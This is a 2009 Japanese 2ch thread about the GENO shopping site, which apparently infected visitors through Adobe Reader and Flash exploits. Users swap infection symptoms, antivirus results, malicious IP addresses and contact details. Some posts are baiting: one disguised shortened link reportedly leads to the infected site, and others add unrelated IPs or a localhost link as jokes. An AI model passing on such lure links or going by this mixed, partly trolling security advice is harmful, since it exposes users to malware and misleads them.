mixiのネタ用にGIGAZINEにタレこんでおいた

windowsupdateが最新だったら安心していいんだよな?
開いたときに何も聞かれなかったし

うｐスレに偽装URL張った奴リアルでぶちのめしたいんだけどｗ

クレカはサウンドハウスの流出以来使ってないな
パスも保存してないし

Readerはアンインスコ、Flashplayerは更新確認頻度を上げておいた

>>293
まだ鯖側の被害の全容が見えていないからなんともいえないけど、
鯖が外部からクラックされてウィルスを仕込まれたのであれば
恐らく鯖の中に保存されてた過去に購入した事がある奴の顧客情報の類が
一切合財盗み出されて、カード情報とか使用しているメルアドにスパムメールがわんさか届く様になるかもしれない。

人を叩いて石橋を渡らせる
　　　　　　　　　　　　　　　 |l ili l ili iliii|i|/　　
　　　　　　　　　　　　　　　 |l ili ili lilii i/　　
　　　　　　　　　　　　　　　 |l ili l ili iliii|
　 ,-､　　　　　　　 　　 　 　|li llil lil @il|
　 ＼＼　　　　　　　　　　　|liii 人 l lilil|
　 　 ＼＼　　∧＿∧　　　 |ii{´┴｀}iiil　　
　///　.＼＼（　＾ν＾ ）　 ※从三从三ﾐ／
　| | |　　 ⊂ （　　　つニ二二二二Σ＞
　＼＼＼ ／(/ノ＼ ＼ 　 ／／／｜ i|＼
　　 　　／ ／_）　（_＿）／／／__ゝ　 ＼
　　 　 '､／　　　　　　バシーン！バシーン！

>>303
何をDLしようとしたのか気になる

>>303
偽装？
短縮URLだろ
zip猿にブラクラでも踏ましとけ

>>299
>>306
サンクス

これ貼りまくろうぜ

ゲノカード使えないのが救いだね

>>180
これでいいのか分からないけど、暫定版のひな形を作ってみた↓　ちなみに自分の場合。

【最終アクセス日(時)】 4/4 11時すぎ
【サイトアクセス時の異常な反応の有無】 無
【サイトアクセス時のAdobe readerの起動の有無】 無
【有の場合、その起動時の状況】 -
【その他アクセス時に異常な反応があれば、その詳細】 -
【その後のPC/OSの挙動の変化】 無
【cmd.exe常駐の有無】 無
【u.batファイルの有無】 無
【その他】 -

【セキュリティソフト/サイトでのチェックの結果】 感染なし
【インストールしているアンチウイルスソフト/DAT作成日】 マカフィー/090404
【アクセス時に使用したブラウザ/ver.】 Firefox 3.0.8
【Adobe Readerのバージョン・JS使用設定の有無】 9.1/有
【OS】 VISTA (32bit)

偽装とか短縮とかどんなやつ？

>>313
見辛い。ウザイ。

ういるすせきゅりてぃぜろたんのこうしんはまだですｋ

>>313
3行で。

石橋を叩く木梨

491 名前： PAC-3(中部地方)[] 投稿日：2009/04/05(日) 00:40:09.36 ID:NtPIQ/1E
URL短縮無料サービスサイト一覧
全部NG入れるの不可能に近いな、海外にも腐る程あるだろうし

is.gd　短縮URL結果　http://is.gd/****大変短いドメイン
ビギナー向け短縮ＵＲＬサービス　短縮URL結果　http://janp.biz/***
TinyURL.com　短縮URL有名サイト(有名すぎでクリックされない？)
Ama_short(あま・しょーと)URL−amazon.co.jpの長いURLを「ギュッ」と短くするURL圧縮・URL短縮・URL変換・URL転送ウェブサービスです。
究極の短縮URL - xurl.jp　短縮URL　http://xurl.jp/ ****'？'や'％'など余計な記号は入りません。携帯に対応
http://jpan.jp/　短縮URL　http://jpan.jp/?****希望するIDが可能な短縮URLサイトです。
2ch2@短縮URLサービス　短縮URL　http://2ch2.net/.l?=*****　URL自動作成
http://32url.com/　短縮URL　http://32url.com/?****　URL自動作成されます
むぉ〜ぶ　短縮URL　http://mo-v.jp/?****　URL自動作成されます
kandou.biz　短縮URL　サービス停止？
mooo.jp　短縮URL　http://mooo.jp/****URL自動作成
エフエムセブン ドットビズ　短縮URL　http://fm7.biz/***URL自動作成
SnipURL　http://fw.iclub.to/ID　URL自動作成or希望のID作成短縮URL
mixi専用 Bit URL Generator　短縮URL　http://mixi.bz/*　URL自動作成
ust.as 韓国語・英語・日本語の短縮URLフォーム有り　登録制
ESTYLE メルアドの取得ができる短縮URL　http://www.estyle.ne.jp/****/
ＵＲＬ転送サービス　http://fw.iclub.to/ID/ を取得できる短縮URL
JGGJ.NET　Yahoo!に登録されている短縮URL　5種類の転送方法を選択できる
SmarTrans - www3.to 無料URL転送サ-ビス www3.to/***短いURLです
5jp.net　http://5jp.net/***　を取得できる短縮URL
URLを短縮化するサイト　http://jpan.jp/?****　を取得できる短縮URL

サウンドハウスで流出あったのか
あそこクレカ支払あったら便利なのにとか思ってたけど、そういうことか。

>>313
【最終アクセス日(時)】 4/4 9時くらい
【サイトアクセス時の異常な反応の有無】 メモリ不足
【サイトアクセス時のAdobe readerの起動の有無】 無
【有の場合、その起動時の状況】 -
【その他アクセス時に異常な反応があれば、その詳細】 -
【その後のPC/OSの挙動の変化】 無
【cmd.exe常駐の有無】 無
【u.batファイルの有無】 無
【その他】 -

【セキュリティソフト/サイトでのチェックの結果】 感染なし
【インストールしているアンチウイルスソフト/DAT作成日】 AntiVir
【アクセス時に使用したブラウザ/ver.】 GoogleChrome 1.0.154.53 シークレットモード
【Adobe Readerのバージョン・JS使用設定の有無】 9.1.0/有
【OS】 XP SP3 (32bit)

DAT作成日って何のこと？

とりあえず、ブラウザ落ちた＝感染ってことでおｋ？

lynxで踏んだけどなんともなかったよ！
開きたい奴は仮想ＰＣで開けよ、ＭＳが無料で公開してるだろ

サウンドハウスの時と比べると今回は盛り上がりにかけるな。
まああっちは利用者数の多い優良店だったからショックがでかかったんだろうが…

>>324
成績が良い子が万引きして捕まった時の周囲の反応の大きさと、
元々素行不良だった子が万引きで捕まった時に周囲からスルーされまくりな場合の落差と同じ構図だなｗ

このスレ見て急いでWindowsUpdateとreader・playerの更新した
普段からよく見てるサイトだったしν速で先に知ることが出来てよかった

GENOを見たとき落ちなかったけど
ウイルス検査しているときに
ブラウザが落ちた

これもアウト？

ふんだけどなんともｎ・・・あれ知らないうちにブラウザが落ちてた

サウンドハウスは被害の範囲が判ってさらに盛り上がった
クレカ（で買った人は）番号にメアド・パスワード全部流出
んで、他のサイトで同じパスワード使ってた人に被害が拡大

genoはまだ被害の範囲が不明

必ず堕ちるならアウト

別に危険じゃないだろ・・・

こういうレベルで危険とか言っちゃう奴って、頑張って勉強してavast入れてる初心者とか
周りの人間がノーガードや期限切れのノートンとかで当たり前って人種？

同じν速民として恥ずかしいわ

>>324
クレカ絡みもあったからな・・・

恐いからwgetで開いたけどまだ怪しいコードが隠れて入ってるし・・・
javascript切っとけば大丈夫そうだけど

>>324
しかもあっちは仕込みがチョンだったからなあ

>>329
ここまで完全にGeno側がスルーしまくりなら
本気でIPAの岡ちゃんに全力で働いてもらうしかないかも知れないなｗ

最低限のことをやらないGENOちゃんは最低だと思いますぅ

>>325
全く以てその通り

genoで買い物した人はほぼ確実に情報が漏洩してるからな…
他人事だからいいけど、こええな

とりあえず踏んじまったやつは再起動の前に1日前から新しく出来たファイル
やフォルダ全消しするぐらいの知能は持ってないのか

Adobe Reader/Acrobat 8.1.2に関するセキュリティアップデート公開
http://www.adobe.com/jp/support/security/bulletins/apsb08-15.html

↑おいらはもろ8.1.2だったからなぁｗ

不正なコード実行とかアプリケーションクラッシュとかのバッファオーバーフロー的なもの　・・・だけであることを祈っとるぞ！
こりゃ元捜査一課の田宮にプロファイリング依頼するしかねーな

さすがにgenoで買い物するなら秋葉行ったほうが安いんだよな

メール会員の情報が漏洩してる可能性も
まじめに個人情報を登録していればの話だけど

>>339
全消しするようなやつも知能あるとは思えんがw

GENOはクレカ扱ってないから良かったな

>>343
まあ全けしは大げさだけど自分でファイル検索をなぜ先にせんのかと

Adobe Readr 6.0.1なんだど古すぎで感染しない？
プラウザは落ちないんだが

>>340
犯人はラトビア人またはラトビアの鯖を踏み台にしたラトビア人以外の人間で、性別は
おそらく男。またはPCに詳しい女性の可能性もある。
年齢は20代から30代、もしくは40代から50代の犯行。あるいは最近は若年層でもこうした
犯罪を行う者が増えている為10代の可能性もある。
被害に関しては個人情報漏洩の可能性はないとはいえない。

>>50
GENOの新品を買ったら欠品があって微妙に使った跡があった
売王の同じ物で値段はGENOより安いアウトレットを買ったら新品未開封のが送られてきた

>>338
名前と住所とメアドかな。


…2月に買い物したときのメールを見ると('A`)

■GENO
電話　047-408-3363
メール　http://www.geno.co.jp/webshop/before.html

■IPA
電話　03-5978-7509　※ただし平日のみ
メール　https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=frm0190

■千葉県警(GENO WEBの所在地)
電話　043-227-9110
メール　https://www.police.pref.chiba.jp/mail/questionary/

■警視庁(GENO本社所在地)
電話(サイバー犯罪専用)　03-3431-8109
メール　http://www.keishicho.metro.tokyo.jp/anket/other.htm

ああ電話番号も書いてる…

いろんなスレで短縮URL貼られすぎだろ

踏んでみて、ノートン先生は何も言わなかったが
Acrobatが不正終了したとのエラーが出た
今トレンドでオンラインスキャン中・・・・

これが終わったらカスペの試用版インストールしよう

>>84のosusume.jsとosusume_shouhin.jsのHTTPヘッダにあるLast-Modified

Last-Modified: Sat, 04 Apr 2009 08:48:49 GMT
Last-Modified: Sat, 04 Apr 2009 08:48:51 GMT

昨日の夕方5時48分からかそのままか

geno-web.jp鯖には問題のコードは無くて悪質なコード自体は>350のgeno.co.jp鯖に置いてあるファイル。
なので>350のGENOを踏むとHTMLにコード埋め込まれてるので(ﾉ∀`)ｱｲﾀﾀ

>348
売王って胡散臭いサイトの割に意外といい感じ困る

ＧＥＮＯ秋葉原店　03-3252-9565

連絡がつかなければ、担当違いだけど秋葉原店に

金曜深夜に登録して注文してしまった('A`)
土曜朝ぐらいに感染？

>>347
鋭い分析だな

>>355 あそこgeno以上に怪しいから触れてなかったけど、アマゾンにも出店してるし、意外と信頼性はあるのかもしれん・・・

>>347
田宮△

昨日昼頃にGENOを見てadobe 8.13のオンラインアップデートが
起動してたのに気づいてから半日放置してた。
でもfirefox2もOSも全く重くならなかった。搭載メモリは4GB。

その後確認のためにadobe reader8.14でアクセスしたら、readerがメモリ食いまくってた。
システムの復元、ウイルスセキュリティ０とAVASTでフルスキャン。
変なexeは接続直後も今もこれといって動いてない。

怖すぎる

習志野警察署（ＧＥＮＯ　ＷＥＢ店　管轄）
275-0015
千葉県習志野市鷺沼台2-4-1

電話 047-474-0110

IE6→無反応
Opera@USB→無反応
Firefox→このページを表示するにはプラグインを追加する必要があります
PortableGoogleChrome→表示するのにプラグインの追加が必要なコンテンツがあります

このプラグインがヤバイのか？

カスペエンジンで駆除も可能なニフティのオンラインスキャンをとりあえず置いときますね
http://www.nifty.com/security/vcheck/index.htm

トップページだけ閲覧してみたが無害っぽい？
と、思ったがブラウザを閉じた後、PCが重たくなり
タスクマネジャを見たら怪しげな.exeが…

俺、＼(^o^)／ｵﾜﾀ
http://go.2ch2.net/u/V2Afcq?mofu4_2137.jpg.html

>>366
巧妙に細工したgenoのサイトか

>>347
60歳以上の人間と10歳未満が犯人である可能性を消すとはなかなか

何故かメモリのコミットチャージが1.56GBも使用してて
感染した形跡がないのにおかしいな〜と思っていたら

RamPhantomが1GB使っててワロスwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

画像に騙されたｗ

ゲロめ許さん
感染はしてないけど以前買ったときの個人情報は保護してくれるんだろうなコラ

>>362
トレンドマイクロのオンラインスキャンしてもなんもないんだよね。
マジで嫌になってるわ。。。

PSPで余裕でした(^o^)ﾉ

>>366もgenoのサイトに飛ぶURL
アクセス注意

とりあえずwiiで見てみるかな

ドリームキャストで見るのも忘れずに

PS3しか持ってない

Adobe Reader 8.1.3入れてFirefox3.0.8で突っ込んでも何も起きないぞ
VistaSP1

>>373
報告乙
開いてしまう所だったｗｗ
これだから初心者はｗｗｗ

>>375
ごめんもってないっすｗ

>>362
俺もほぼ同様の症状。
FireFox3でgeno行ったら突然AdobeReaderの強制終了のダイアログが出て「なんぞこれ？」
と思ったけど特に重くもならず使用メモリ量も増えず。メモリは2GB。
で、adobeのオンラインアップデートが起動したけどいつも無視してるので気づいた時点で
終了。

その後このスレに気づいてシステムの復元、avastでとトレンドマイクロのオンラインで
Cドライブフルスキャンするも異常なし。

conime.exeが再起動後も自動起動されてるのが不気味。

>>366
仲間増やそうとするんじゃねぇよｗ

>>49
つよそう

>>84
一番下のリンク踏んでみたら
ウチのacrobat 8.1.4が開いて中身の文字列が

WpO1iRPgw6lc4a

なにこれ

>>1のリンク踏んでも何も起こらなかった

W-ZERO3で踏んでみたけどサイトはマジで放置なんだなｗ
つかWMなら大丈夫だよね？

>>366
GENO見てから×ボタン余裕でした。

うひょ、久しぶりにIE6立ち上げたら、相変わらず固まったｗ　FFは対策済みなのでおｋだけどな
svchost.exeが8個一気に動いてるっｗ　System Idol Process98%！！netstatでは例のIP出てこなかったぜぃ
うひょひょひょ・・・泣けてきたｗ　IEキャッシュ消せばいいのか？まぁ滅多に使わんけど・・

普通のアンチウイルスソフトで対応できるようなら、これほど騒がれてもいないのでは？
何か対策しろよＧＥＮＯ。

>>369
ざまあ

昨日の昼過ぎに見たようだけどなんともないな
winupdate最新
adobeAcrobat入れてない
firefox3
noscript
メモリ増えたり強制終了もない
cmd.exeもconime.exeも動いてない

>>367
>>373
おいおい、>>366はサイトじゃなくて、その画像だぞｗｗｗ

>>241
履歴を見たら昨日ここにアクセスしていたわ
昨夜IE6落ちまくりでwindows Updataにもつながらなかったけど、これのせいか？

>>355
忘れてたわ
>>350のGENOのメールは代わりにこっちを
[email protected]

>>389
ID変えてまで必死すぎるだろ

>>366
お前のディスクトップきもすぎワロタ

>>366
JavaScript有効にしますか？って聞かれたんで｢全力で」を押しました

開いたけど何ともないぞ。

もしかしてfirefoxでアドイン入れてるからか？

>>366
>トップページだけ閲覧してみたが無害っぽい？
>と、思ったがブラウザを閉じた後、PCが重たくなり
>タスクマネジャを見たら怪しげな.exeが…
>
>俺、＼(^o^)／ｵﾜﾀ
>http://go.2ch2.net/u/V2Afcq?mofu4_2137.jpg.html

アップデート後のAvast!だと「マルウェアサイトへの接続を遮断しました」と警告が出て、
ブラウザ自体も落ちないし、PFの食い尽くしもなくなった。

まあ、一応これでいいか。

DVD１０枚くらい焼いた
火狐のバックアップも取ったしそろそろ逝くか
もっともサブPCがあるからそっちで遊んでいればいいだけだがな
だが、入れなおした後もろもろもドライバのインスコがめんどくさいなぁ
どこのどいつだよこんなことしたの。
責任取らせようかな

んで、実際電凸したやついんの？

これ嘘の激安情報書いて２ｃｈ中にコピペされたら
絶対俺踏んでたわ・・・マジ怖すぎるだろ

とりあえず暫くはzipスレの画像すら踏めんな

expert PDF viewerの俺様安心かと思ったら、
感染してた。ふざけんな。

javasはoffにしてたんだが、
9時タイムセールのフラッシュ踏んだからいけなかったんだな...

とりあえずzipスレとやらに貼りまくればいいのか

>>397
nliteで統合すればいいじゃん

>>399
その発想は無かった

とりあえずPDFをReaderで自動で開かないようにしとけばいいんだろ

GENO終わったな、こりゃ被害額億いくで

>>405
そうだねもう来なくていいよ（苦笑）

火狐でプラグインを入れろとか出るけど如何なのよ？

>>402
まぁ削除人が動けば一発規制だとおもうがどうぞどうぞ

　　　　　　　 lヽ ﾉ l　　　　　　　　ｌ l　ｌ ヽ　　 ヽ
　 )'ｰーノ(　 |　|　 | ､　　　　　 / l｜ ｌ　ハヽ　　|ｰ‐''"ｌ
　/　P　　|　|　|／| ﾊ　　/ / ,/ /|ﾉ /l /　ｌ l ｌ|　ｌ　 P ヽ
　l 　 ･　　i´ |　ヽ､| |ｒ|| |　//--‐'" 　 ｀'メ､_ｌﾉ| /　 ・　 /
　|　 D　　l　 トー-トヽ| |ノ　''"´｀　　　ｒｰ-/// |　 D　｜
　|　 ･　　 |／　　 　 | l ||､　''"""　 j　""''/ | |ヽｌ 　・　｜
　|　 F 　 |　　 　 　 | l |　ヽ,　 　― 　 ／　| |　ｌ　 F　 |
　| 　 !!　 |　　 　 /　| | |　　 ` ｰ-‐ ' ´||　,ﾉ| |　|　　!!　｜
ノｰ‐---､,|　 　 /　│ｌ､l　　　　　　 　 |ﾚ' ,ﾉﾉ　ﾉハ､_ノヽ
　/ 　　 　 　 ／　ノ⌒ヾ､　 ヽ　　　 ノハ,　　　 　 |
,/ 　 　　　,イーｆ'´ /´　　＼　| ,／´ ｜ヽl　　　 　 |
　　　　 ／-ト、|　┼―- ､_ヽﾒr'　, -=ｌ''"ハ　　　　|　 ｌ
　　 ,／　 　|　ヽ 　＼　　_,ノｰｆ' ´　　ﾉノ　 ヽ　 　｜　|
､_　　　 _ ‐''ｌ　　`ー‐―''" ⌒'ｰ--‐'´｀ヽ､_ 　　_,ノ　ノ
　 ￣￣　　 |　　　　　　　　　　 ／　 　　　　￣

>>401
俺も昨日タイムセール踏んだんだけど
感染してないようだが･･･

どこ見たらわかる？？

ブラクラと称されたＰＤＦもここまで進化したか
泣けてくるな

>>411
geno-webのほうだけなら大丈夫だという話のようです

昨日geno見たんだけど
感染したかどうかわからない
どうやって確認すんだ？

>>411
a-squared Freeでスキャンしたら出てきた。

　　　　　　　　　/＼＿＿__/＼
　　　　　　　 ／　　　　　　　　 ＼
　　　　　　／　／・＼　　／・＼　＼
　　　　　 |　＿ ￣￣　　　￣￣＿　|
　　　　　 |　＿　　（＿人＿）　 ＿　|
　　　　　 |　＿　　　＼　 　|　　＿　|
　　　　　　＼ 　 　 　　＼__|　　　／

AntiVirは糞　消さなくてもいいのまで消す

>>183
conime.exe　ユーザー名で動いてるんだけどアウト？

ディスクトップｗ

>>418
何もしてないのに動いてるならアウト

>>418
　　　　　　　　_,ｌ;;;;;;;;;;;;;l,,_
　　　　　　,.ｒ'´;: 　八 　'::..ﾞヽ
　　　 　 ,.'＿＿_ _立_ _＿;;ミﾞ;、　　　　　フT
　 　 　 l厄巳厄　i王i ,.巳厄巳ｌ　　　　 夕 ヒ
　　　,.-'l　i,.:'　　ヽ:.、　;.:'　'　ヽ |,.、　　
　 　/{´ｉY´ヾｰtｯ-ヽ''　ｋｰtr-,'´lri　　　＿l＿
　　 {_i,入::.. ｀￣￣,'i!ヽ;｀￣´ ﾞ::.}rﾘ　 　　ｉ,＿
　　 ヽ_ﾉiヾ ;:. ＿ i': ll!:,ｨ .＿　.: j,ノ
　　ｯｼﾞ::;;|　,r'´;;:＞￣弋´;;::ヽ;r1:ﾞ'ｲｨ 　 ┬‐宀
　 弍::::::::l　i':;r'´ ,.-ｰｰ-､.ヾ;:;i. |:::::::ｽ 　 ﾉ□隹
　　 彡;:::ｌ　l::l　 '　 ---;:, ﾞ　l::l |::;;ｬ`　　　、
　 　,r',广ヽl::l　::.　.: 　　ﾞ:. 　l:lﾉ^i`､　　　三刃
　 ,ｲ（:::j 　 i::iヽ 　:. 　　 .: ／l:l'" l:ヽヽ　 口心
　|;:;.＼＼　l::l　 ',　:;:::..::. / 　l:l,r''／;::;;|

俺、それ動いて無いけどスゲー不安だ

級にプラグイン入れろって出た時いれなくて助かったのか･･･？

http://www.geno-web.jp/Goods/GA09073840
これ欲しいんだけど、今注文出したらアウトかな？

水曜日前後に見ただけなのに、さっきconime.exeがあったからタスクマネージャで終了した

>>418
それコマンドプロンプト起動したら一緒に起動して
コマンドプロンプトが終了しても動き続ける

>>423
なにさりげなく出して踏まそうとしてんだよｗ

ID:3fuyKCnQ

そういや、あのタイムセールページもなんでいちいちflash踏ませるんだ？
urlだけかいときゃいい話じゃん

>>424
俺もあるけど、それってMS-IMEのプロセスだよね。

なんだ、コマンドプロンプトを開くたびにconime.exeが起動するのね

>>413
geno-webのページを開くとjsやら画像やらをgeno.co.jpから引っ張ってくるからgeno.co.jpを開いてるのといっしょ。
かといってhostsファイルに書いてもフレームとかからgeno-webが引っ張ってきて表示しちゃう。
中の人がgeno-web内の問題を探しても見つからない。

google toolbarで"geno-web.jp"で検索掛けたら直で跳びやがったｗｗｗ

俺もアウツ？？

お前らゲノゲノいってるけど
他のサイト見ても感染する可能性もないことはないんだからな？

>>420
>>421
>>425

さらに>>366踏んだ＼(^o^)／
再起動で確かめて見る

>>423
わざと見たくなるように仕向けるんじゃねえ
気になるなるなるなるだろうが

>>431
なるほどそうなんですか。
いやはや勉強になります。

しかし紙一重の所で助かった。
昨日の1時ごろには見て痛んだよなあ。

心配ならブラウザのお気に入りだけ残してクリーンいんすこ

>>426
>>435
これ↓をIEの制限付きサイトに登録すれば無問題だぞ。
http://94.247.2.195/

報告　ブラウザはFireFox Adobe Readerのバージョンは8代で詳しいことは憶えてない

昨日の朝9時ぐらいにgenoを閲覧、その時にAdobe Readerの新しいバージョンが出てるからアップデートしろとのウインドウが出る
その時にAdobe Readerをバージョンアップ

そして今日カスペルスキーのオインラインスキャンを実行→スキャンの結果はウイルスの隔離ファイル、Symantec AntiVirus Corporate Edition\7.5\Quarantine\XXXXXXXX.VBNが三つ見つかっただけで他は無し
タスクマネージャーを見ても怪しいプロセスは無し

avast、昨日のウィルス定義だと反応しなかったが、今だと反応した。
再度avastでフルスキャン中・・・

>>366
これ開いたけど専ブラならセーフだよね？

今使っているのが
10年前のpcで98→xpのアップグレード
だからよかった。

一応バックアップは取ってあったんだけど

>>438
おまえは絶対絶対絶対絶対信用しねえ！

>>441
専ブラジャーでもIEのコンポーネント使ってればｱｳﾁ

>>441
セーフ

>>438
これすげぇ

ここ接続できなければセーフ。接続できたらｱｳｱｳ
http://127.0.0.1/

avast今データベース更新したのでwebシールド、ネットワークシールド、標準シールド
の感度を高にして踏んでみたけど何も反応しない

>>440
俺もavastが反応した。同じくフルスキャンしてる。

>>444
今時IEコンポの専ブラなんてあるの？

さすがAVASTだな
更新の遅さに定評のあるAVGは脂肪

>>447
俺専用ローカルブログが開くぞ

起動が妙に遅い・・・アバストでフルスキャン中

やはり信頼できるセキュリティソフトはカスペル先生だけ

なんでこんな騒ぐ奴いるんだろうな

>452
インターネッツにうｐ

今回はavastは鉄壁だな。
一方、aviraはクソの役にも立ってない。
ノートンとかNO32とかは有料のくせにてんでダメ。

本スレいったら社員がgenoに罪はないとか必死でワロタ

>>457
avastも昨日時点では反応してない。

>>139
俺もカスペしようとしたらこれだわ

Geno宣伝しまくりでうざかったしﾒｼｳﾏ

あヴぁｓｔさんうｐだてきたわぁ

　　　　　　　　ﾞ!:|:::::|::ｌ::|:l::l:;l斗:::‐!| |:::ｌｉ| l::::::十!‐+|::_l:::li::::/,小､{_ｲ＾| ﾄ､ヽ,)
　　　　　　　　/ﾊ:::::!::l::l:{::!::l:::! ::::l:| |:::ｌｉ| ﾞ!::::::ﾄ!:::::l:li:::トl:l└vｵ 　ｌ　|/| ﾞＹ
　　　　　 　　/ ハ::::!::!:l:|::!ﾞy,ｧﾈ宀､` ヾヾヽ　,ｧ7=!ｔ､:l::|:l:i (勹　j　j/}|　| 　
　　 　 　 　 / /　 ヾﾐ:l::|ヾYｵﾞh ::::::} 　 　　　１i　.::::ヽ!:|:ｌi と,ﾌ /　!Y::|　|
　　　 　 　 ヽ/　　 　l｀:::`:l|:ｉ　ﾋﾞ_''ﾂ 　 　 　　ﾄ!､:;;;;::ﾘﾄ川（ｲﾘ/　/i::i:l:|　|
　　　あ、バスト？　.｜:: ::j:!:kXxx　　. 　　　　`ｰ--'/,';!::!jﾞY,/　/::|::ｉ:|:| ｜
　　　　　 　 　 　 　 ｜:: :l:ｌ:ｉlヽ、　　　､ 　 　 xXxx//// }j"lヽ/ :::ｌ::l:|:L_｣
　　 　 　 　 　 　 　 ｜:: :l:|:l:|:{:{＞ ､ 　 　　　 ,.　ｧ' /⌒ｱヶ-<|:: i::::|::l:|l
　 　 　 　 　 　 　 　 | :: :l:|:l:|:}宀<⌒ｉ` ┬ ' 　,ｨ⌒7‐宀 <,r少t:｣::::|::l:|l
　　　　　　 　 　 　　j :: :l:|:l:ﾉ　　 ヽ l _/」　,ｨ⌒ｉ 丿　　　 ヾ　　｣:l:::|::::|l　　　
　　　　　　　　　　　,' ::;:'i'ｆ~　ヽ､　 ﾞ!ノ　ﾉ,〃ｆｰｹ′ 　 　 　ﾞ{￣ ｛:l::|::::l:l、
　　　　　　　　　 　/ :;:'/j） ､　　)ｰ' `　７/ﾋ ^Y′ 　 　 　 　ﾋ二 Y::|::::l::ｌi　
　 　 　 　 　　　　/::;:'/:;に._＞r',rｭ､__,//,f'＾ﾝ′ ! 　 　　　　Ｌ.__了::l::::|::l:i、　
.　　　　　　　 　 /:;:'/::;r'ﾒ-{￣Y^y-‐‐ｆﾞ }ノ｛　 ヽl　　　　　　ト､　｀)!| ::|::l::l　
　　　 　 　　　　l::;'/::;〆　 ,ﾝｰヵﾍ、__｣ ,Ｋ‐ ）　　ﾞ!　　　 　　|/`y{ |::| ::|::|::|　　　　
　 　 　 　 　 　 ﾚ/〆 　／　 / j 　 |　| l に（　　　ｌ 　　　　　|ヽj | l:::| ::|::|::|
　 　 　 　 　 　 ﾋＹ 　 　＼_,/　{_＿｣　ﾞ!{ ト､_}　　　l 　 　 　　!'´//j ﾘ !j }l/ 　
　　　　　 　 　 　ﾋｔ. 　 　 　 　 　　　　　Ｙ__丿　　　ｌ　　　　　|〃/ / 〃/ 　 　
　　　　　　　　　　込　　　　　　　　 　 　 ﾋ_ ） 　 　ﾉ! 　 　 　 ! / / 　 /
　　　 　　　　　　　`心_　　　　　　　　　　ヽ-}　_／ ,ﾊ 　 　 　l 　 　 　
　 　 　 　 　 　 　 　 　 `‐ｎ ､ _　　　　_ _　}'う｢ 　 /　_! 　 　　ト

カスペアメリカ版ならできたわ

AVG更新来たらおしえてくれ

昨日クリーンインストしたばっかなのにふざけんな

また一日つぶれんのかよ……

>>443
そんなこと言うなよ…

あと、ここいら辺↓もIEの制限付きサイトに登録しとけば無問題だな。
http://124.83.167.212/
http://66.249.89.147/
http://206.223.150.96/

このスレ開いたらビューアが自動的にgenoにアクセスして
サムネ取得してるんだがこういうのって大丈夫なのかなぁ

潰れろよ胡散臭いし

>>457
ほんの数年前まではNortonもNOD32も評価高かったのになあ。セキュ板が崩壊してるからどれが良いのかわからん。
KasperskyかG-DATA辺り選んどけばいいの？

ウィルスソフト無料配布しろよ糞GENO

前スレにもあったけど火狐+Adblock Plusのやつは
*/94.247.2.195/*
をブロック要素の追加。

>>471
今配布してんだろアホか

>>471
ウィルスソフトの無料配布なら今やってるじゃんｗ

お前らセキュリティソフトなに入れてんの？
フリーの防火壁入れたほうがいい？

ぞーんあらーむ

PCTool

来週中にでもID:3fuyKCnQの家に捜査員が向かいます

知ってよかった これから被害者続出だろうな

>>471>>473-474
ワロタｗｗ

GENO OUTLETの方、昨日踏んだんだけど、
トップページが壊れてただけだったよ
プラグインとか起動しなかったけど
通販サイトの方が不味いのかな？

ID:3fuyKCnQ
こいつ他のスレにも無差別にリンク張ってたカスだろ
もっとやれよ

>>475
ぞぬは更新するからいいぞ

>>463
zip!!

どうせ貼るのなら他に板にもいけよ

>>481
バックグラウンドで勝手に起動してバッファオーバーフローさせて管理のっとるんでしょ？
クリックしたけど何もなかったよってのはなんの確証にもならないんじゃないの

これマカーもアウトなの？

何も起きたように感じなくてもGENOサイト行ったならウイルスチェックは必要だと思うよ。
ウイルスの無料配布のGENOかあ、金貰ってもいらん。

俺の個人情報がもれた可能性があることに対してすごく遺憾だ

553 名前：名無しさん[sage] 投稿日：2009/04/05(日) 16:02:30 0
webのことは店舗では分かりません


期待通りの回答
さすがだ

554 名前：名無しさん[sage] 投稿日：2009/04/05(日) 16:04:33 0
>>553
電話したの？
ご連絡ありがとうございます程度も言わなかったの？

555 名前：名無しさん[sage] 投稿日：2009/04/05(日) 16:08:47 0
本社の責任者に連絡すらもしないのかｗ
緊急時に連絡しないなんてありえない

AdobeReaderはバージョン9でゼロデイ攻撃が発生して
この前9.1になったばっかりだな
このスレ開いた人間は>>1のリンク踏むより何より先に
WindowsUpdateの実行とAdobeReaderとFlashPlayerのバージョンアップをしましょう

NoScript最強伝説

ID:3fuyKCnQ
てめ、他のスレに貼るなよ。シャレになってないぞ。

こういうのは無差別に攻撃しててその結果発覚したのが偶然Genoだった
というだけなんだけど、他のサイトも攻撃されている可能性が高い
価格.comのときも一番有名だったのがそれだっただけで
他にもいくつか被害が出てた

Genoと同じサーバ構成のところは要注意かもな
Server: 4D_WebStar_D/2004
聞いたことないと思って調べたけどMac系のWebサーバみたいだね
どうのっとられたのかはわからないんでなんともいえんけども

各最新版
http://get.adobe.com/jp/reader/
http://get.adobe.com/jp/flashplayer/

http://122.221.10.232/
http://122.221.10.234/

ノシ

flash 10,0,12,36
adobe 8.13
win最新

でもJaneStyleで>>366クリックしただけだし
そもそもつながらんかった。一応nifty版カスペでスキャンしとる。

>>496
URL！URL！

>>486
Acrobatリーダーか、フラッシュのプラグイン使って感染させるんじゃないの？
ソースチェッカーで、ソース見てみたけどPHPのエラーが出てるだけのような
確かにウィルススキャンは必須だと思います

VMwareServer6.5
Windows XP Home Edition SP3 更新プログラム最新
Firefox 3.0.8
NoScript 1.9.1.6
AVG 8.5.258 270.11.41./2041
spybot 1.6.2.46
Flash Player 10,0,22,87
ADOBE READER 9.1.0 2009/02/27
(AGM 4.18.84 Cooltype 5.5.61 Core 9.256 JP2K 2.0.0.2579 ADM 9.01x0)

NoScriptだけで回避余裕でした

昨年、ガールフレンド7.0からワイフ1.0にアップグレードしたところ、
思いがけないことが次々と起こり、困っています。

アップグレードして間もなく、チャイルドという名前のプログラムが
いくつもでき、容量をすごくとるので、お金をつぎこんで環境を
変えざるを得なくなりました。
さらにワイフ1.0は、他のプログラムに勝手に自分をインストールし、
全プログラムの監視をしています。
たとえばゴルフ3.1や飲み会5.0といったアプリケーションは、
動きが悪くなっています。キャバクラ6.2に至っては、まったく動きません。
選択するだけでクラッシュしてしまいます。

そこで、ワイフ1.0をガールフレンド7.0に戻したいんですが、
このワイフ1.0のアンインストールがうまくできません。
強引にアンインストールしようとすると、システム全体を
巻き込んでしまいそうです。
いい方法を教えてください。

今avastのフルスキャン終了したが問題ないみたいだ。

>>497

>>503
なんかいってみろや

